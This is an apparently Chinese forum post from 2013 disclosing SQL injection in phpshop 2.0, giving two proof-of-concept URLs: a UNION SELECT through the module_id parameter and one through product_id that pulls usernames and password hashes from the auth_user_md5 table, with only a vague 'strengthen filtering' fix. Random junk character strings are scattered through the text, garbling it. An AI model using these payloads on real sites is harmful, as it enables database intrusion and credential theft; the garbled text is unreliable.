标题 : phpshop 2.0 SQL Injection Vulnerability& Q! Z6 {7 o: u4 `8 ]% d
% D4 `; v0 c1 i2 E% @
作者 : By onestree1 H' Q/ W( J& o/ y
下载地址 : http://code.google.com/p/phpshop/downloads/list6 j! n, p I* F, [% s% K, Z, a, L
测试地址: windows 7 / ubuntu" I' z' A5 Y Y# t/ a0 t% B
, C8 i+ C8 u" K# `* C 5 ?6 q) r: k9 f$ F: p i
SQLi p0c:
3 } E. Q0 }4 w5 A1 N2 B0 Y! z ' a7 r9 e. F9 L8 O
==================0 ]! t Z0 f0 _% ~7 ?! T3 ?3 _4 [
; t. Q, h2 r, A/ C; x0 v; q6 o! y/ \4 [
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
- Z2 ~2 B$ I0 Bunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
9 ?# [! j6 F6 l( j* G7 | + v, f" a$ z/ `6 d& j: L
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
" l. _) `" O8 e3 L. ~* F* _' ^9 o
$ J3 n; ~$ Z& D* Z5 G& T/ Q2 @) q修复:
; w' j# G0 @6 U/ R$ k) K0 h加强过滤
- a4 E; a& U/ V
9 v& y* q4 Q% e
* ?, d) V8 g5 \2 h. o1 n5 r3 E |
发表于 2013-1-18 18:24:10
收藏
支持
反对